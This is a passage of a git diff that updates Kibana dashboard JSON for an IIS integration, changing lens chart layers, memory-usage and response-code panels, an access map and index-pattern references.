"tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.virtual_bytes" + }, + 
"f5f6b376-3047-4471-9f0c-f615b00f961e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + }, + "317f3825-6707-4b9b-af65-dc79a25e6360": { + "columnOrder": [ + "a59431a7-a573-4899-addd-60959bcbb420", + "a97dceba-f368-47fb-b537-af02cd8ab7e1" + ], + "columns": { + "a59431a7-a573-4899-addd-60959bcbb420": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a97dceba-f368-47fb-b537-af02cd8ab7e1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Working Set", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.working_set" + } + }, + "incompleteColumns": {} + }, + "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535": { + "columnOrder": [ + "26de4342-767f-4b20-b407-1103af88a599", + "5d68f5c0-defb-4876-b833-3a96972af5b9" + ], + "columns": { + "26de4342-767f-4b20-b407-1103af88a599": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "5d68f5c0-defb-4876-b833-3a96972af5b9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Private Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + 
}, + "scale": "ratio", + "sourceField": "iis.webserver.process.private_bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "5d68f5c0-defb-4876-b833-3a96972af5b9" + ], + "layerId": "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "26de4342-767f-4b20-b407-1103af88a599", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "5d68f5c0-defb-4876-b833-3a96972af5b9" + } + ] + }, + { + "accessors": [ + "c8b59433-2924-4437-a385-60c9bc32a310" + ], + "layerId": "2cc87279-fd94-4e95-ab66-ab2585b855c5", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "f5f6b376-3047-4471-9f0c-f615b00f961e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "c8b59433-2924-4437-a385-60c9bc32a310" + } + ] + }, + { + "accessors": [ + "a97dceba-f368-47fb-b537-af02cd8ab7e1" + ], + "layerId": "317f3825-6707-4b9b-af65-dc79a25e6360", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "a59431a7-a573-4899-addd-60959bcbb420", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(149,0,188,1)", + "forAccessor": "a97dceba-f368-47fb-b537-af02cd8ab7e1" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - 
"gridData": { - "h": 15, - "i": "049042c8-335a-4a0f-834b-97d2fa0efc62", - "w": 24, - "x": 24, - "y": 23 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "049042c8-335a-4a0f-834b-97d2fa0efc62", - "title": "Memory Usage", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Webserver Process Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-2c171500-858b-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "1f700551-5464-467f-99ec-3b329e355195:indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d2f639d2-4288-4110-871d-c123e43a8a5f:indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6:indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9acc09af-8176-4625-927d-af97d4b5080b:indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de5da809-a2ac-4388-9040-ed6f037c901d:indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a64ca567-3295-4753-9a22-2ce5dcb16a40:indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", - "type": "index-pattern" - 
}, - { - "id": "metrics-*", - "name": "90575b21-d32b-46c4-a798-a2919f4f9129:indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "00e3504a-5841-41ee-bdf6-e9e2633da51c:indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "73429e76-7391-4cb0-94d4-6a7f0eae0803:indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", - "type": "index-pattern" + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", - "type": "index-pattern" - } + "title": "Memory Usage" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Webserver Process Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "1f700551-5464-467f-99ec-3b329e355195:indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d2f639d2-4288-4110-871d-c123e43a8a5f:indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"8392c4c6-1aed-4e8d-9015-15526bc1ceb6:indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9acc09af-8176-4625-927d-af97d4b5080b:indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de5da809-a2ac-4388-9040-ed6f037c901d:indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a64ca567-3295-4753-9a22-2ce5dcb16a40:indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "90575b21-d32b-46c4-a798-a2919f4f9129:indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "00e3504a-5841-41ee-bdf6-e9e2633da51c:indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "73429e76-7391-4cb0-94d4-6a7f0eae0803:indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"049042c8-335a-4a0f-834b-97d2fa0efc62:indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", + "type": "index-pattern" + } + ], + "managed": false }
\ No newline at end of file
diff --git a/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json b/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json
index be7f8d952e8..6b40143e7f0 100644
--- a/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json
+++ b/packages/iis/kibana/dashboard/iis-4278ad30-fe16-11e7-a3b0-d13028918f9f.json
@@ -1,840 +1,863 @@ { - "attributes": { - "description": "Dashboard for the Logs IIS integration", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } + "id": "iis-4278ad30-fe16-11e7-a3b0-d13028918f9f", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNSwxXQ==", + "attributes": { + "description": "Dashboard for the Logs IIS integration", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "query": { + "language": "kuery", + "query": "" }, - "optionsJSON": { - "darkTheme": false, - "hidePanelTitles": false, - "useMargins": true + "version": true + } + }, + "optionsJSON": { + "darkTheme": false, + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hiddenLayers": [], + "isLayerTOCOpen": false, + "mapBuffer": { + "maxLat": 66.51326, + "maxLon": 180, + "minLat": -66.51326, + "minLon": -180 + }, + "mapCenter": { + "lat": 19.94277, + "lon": 0, + "zoom": 1.58 + }, + "openTOCDetails": [], + "attributes": { + "title": "Access map", + "description": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}", + "mapStateJSON": 
"{\"center\":{\"lat\":19.94277,\"lon\":0},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":true},\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"browserLocation\":{\"zoom\":2},\"disableInteractive\":false,\"disableTooltipControl\":false,\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"hideLayerControl\":false,\"hideToolbarOverlay\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":1.58}", + "layerListJSON": "[{\"alpha\":1,\"id\":\"5875b362-0633-4f76-a8d3-6e24337bacc0\",\"includeInFitToBounds\":true,\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\",\"type\":\"EMS_TMS\"},\"style\":{\"type\":\"TILE\"},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"cc7a42a7-7e5c-4ee5-90f3-972c488b05ee\",\"includeInFitToBounds\":true,\"joins\":[],\"label\":\"Access map [Logs IIS]\",\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyForceRefresh\":true,\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"geoField\":\"source.geo.location\",\"id\":\"bb680314-5606-4509-ac4f-f1089c1180db\",\"indexPatternRefName\":\"layer_1_source_index_pattern\",\"metrics\":[{\"type\":\"count\"}],\"requestType\":\"point\",\"resolution\":\"MOST_FINE\",\"type\":\"ES_GEO_GRID\"},\"style\":{\"isTimeAware\":true,\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Yellow to 
Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"type\":\"ORDINAL\"},\"type\":\"DYNAMIC\"},\"icon\":{\"options\":{\"value\":\"marker\"},\"type\":\"STATIC\"},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"maxSize\":18,\"minSize\":7},\"type\":\"DYNAMIC\"},\"labelBorderColor\":{\"options\":{\"color\":\"#FFFFFF\"},\"type\":\"STATIC\"},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelColor\":{\"options\":{\"color\":\"#000000\"},\"type\":\"STATIC\"},\"labelSize\":{\"options\":{\"size\":14},\"type\":\"STATIC\"},\"labelText\":{\"options\":{\"value\":\"\"},\"type\":\"STATIC\"},\"lineColor\":{\"options\":{\"color\":\"#3d3d3d\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":1},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]" + } }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hiddenLayers": [], - "isLayerTOCOpen": false, - "mapBuffer": { - "maxLat": 66.51326, - "maxLon": 180, - "minLat": -66.51326, - "minLon": -180 - }, - "mapCenter": { - "lat": 19.94277, - "lon": 0, - "zoom": 1.58 - }, - "openTOCDetails": [] - }, - "gridData": { - "h": 15, - "i": "ec72819b-6985-4761-94ae-5d5fcc9e682a", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "ec72819b-6985-4761-94ae-5d5fcc9e682a", - "panelRefName": "panel_ec72819b-6985-4761-94ae-5d5fcc9e682a", - "type": "map", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - 
"layers": { - "238d8224-43e0-4df5-9862-decc0b59c88e": { - "columnOrder": [ - "71e2f8c4-a180-4bca-aa3c-1517b6265357", - "43487d89-4842-45a4-93a2-b616ef23ed62", - "533bfa0f-236b-43db-a528-a399a265237f" - ], - "columns": { - "43487d89-4842-45a4-93a2-b616ef23ed62": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "533bfa0f-236b-43db-a528-a399a265237f", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "533bfa0f-236b-43db-a528-a399a265237f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "71e2f8c4-a180-4bca-aa3c-1517b6265357": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "gridData": { + "h": 15, + "i": "ec72819b-6985-4761-94ae-5d5fcc9e682a", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "ec72819b-6985-4761-94ae-5d5fcc9e682a", + "type": "map", + "version": "8.4.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", + "w": 28, + "x": 0, + "y": 15 + }, + "panelIndex": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-238d8224-43e0-4df5-9862-decc0b59c88e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + 
"datasourceStates": { + "formBased": { + "layers": { + "238d8224-43e0-4df5-9862-decc0b59c88e": { + "columnOrder": [ + "71e2f8c4-a180-4bca-aa3c-1517b6265357", + "43487d89-4842-45a4-93a2-b616ef23ed62", + "533bfa0f-236b-43db-a528-a399a265237f" + ], + "columns": { + "43487d89-4842-45a4-93a2-b616ef23ed62": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "533bfa0f-236b-43db-a528-a399a265237f", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "533bfa0f-236b-43db-a528-a399a265237f" - ], - "layerId": "238d8224-43e0-4df5-9862-decc0b59c88e", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "43487d89-4842-45a4-93a2-b616ef23ed62", - "xAccessor": "71e2f8c4-a180-4bca-aa3c-1517b6265357", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "533bfa0f-236b-43db-a528-a399a265237f" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "yTitle": "Count" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "533bfa0f-236b-43db-a528-a399a265237f": { + "customLabel": true, + "dataType": 
"number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "71e2f8c4-a180-4bca-aa3c-1517b6265357": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 12, - "i": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", - "w": 28, - "x": 0, - "y": 15 + "layers": [ + { + "accessors": [ + "533bfa0f-236b-43db-a528-a399a265237f" + ], + "layerId": "238d8224-43e0-4df5-9862-decc0b59c88e", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "43487d89-4842-45a4-93a2-b616ef23ed62", + "xAccessor": "71e2f8c4-a180-4bca-aa3c-1517b6265357", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "533bfa0f-236b-43db-a528-a399a265237f" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "88dc28a3-1ff6-448c-aa64-06f954ea2e8f", - "title": "Response codes over time", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", - "type": "index-pattern" - } 
- ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700": { - "columnOrder": [ - "d8f9ffaf-6b57-4eda-8609-51b4527aad60", - "26bc4021-a53a-4624-a8ca-291f5b728a61", - "85e05d12-166f-418c-94c8-2717876b57fb" - ], - "columns": { - "26bc4021-a53a-4624-a8ca-291f5b728a61": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "85e05d12-166f-418c-94c8-2717876b57fb", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "85e05d12-166f-418c-94c8-2717876b57fb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "d8f9ffaf-6b57-4eda-8609-51b4527aad60": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Response codes over time" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1823acfd-eadf-42be-b208-773047e26dec", + "w": 20, + "x": 28, + "y": 15 + }, + "panelIndex": "1823acfd-eadf-42be-b208-773047e26dec", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", + "type": 
"index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700": { + "columnOrder": [ + "d8f9ffaf-6b57-4eda-8609-51b4527aad60", + "26bc4021-a53a-4624-a8ca-291f5b728a61", + "85e05d12-166f-418c-94c8-2717876b57fb" + ], + "columns": { + "26bc4021-a53a-4624-a8ca-291f5b728a61": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "85e05d12-166f-418c-94c8-2717876b57fb", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "85e05d12-166f-418c-94c8-2717876b57fb" - ], - "layerId": "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "26bc4021-a53a-4624-a8ca-291f5b728a61", - "xAccessor": "d8f9ffaf-6b57-4eda-8609-51b4527aad60", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "85e05d12-166f-418c-94c8-2717876b57fb" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "yTitle": "Count" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + 
"85e05d12-166f-418c-94c8-2717876b57fb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d8f9ffaf-6b57-4eda-8609-51b4527aad60": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 12, - "i": "1823acfd-eadf-42be-b208-773047e26dec", - "w": 20, - "x": 28, - "y": 15 + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "panelIndex": "1823acfd-eadf-42be-b208-773047e26dec", - "title": "Error logs over time", - "type": "lens", - "version": "8.5.0" + "layers": [ + { + "accessors": [ + "85e05d12-166f-418c-94c8-2717876b57fb" + ], + "layerId": "ddb9c755-6e2e-4aa2-a0ad-47f5a3802700", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "26bc4021-a53a-4624-a8ca-291f5b728a61", + "xAccessor": "d8f9ffaf-6b57-4eda-8609-51b4527aad60", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "85e05d12-166f-418c-94c8-2717876b57fb" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": 
